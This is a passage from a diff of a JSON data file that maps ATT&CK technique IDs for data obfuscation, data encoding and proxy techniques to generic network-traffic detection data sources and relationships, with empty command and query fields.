to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1001.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1132.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1090.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1090.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + 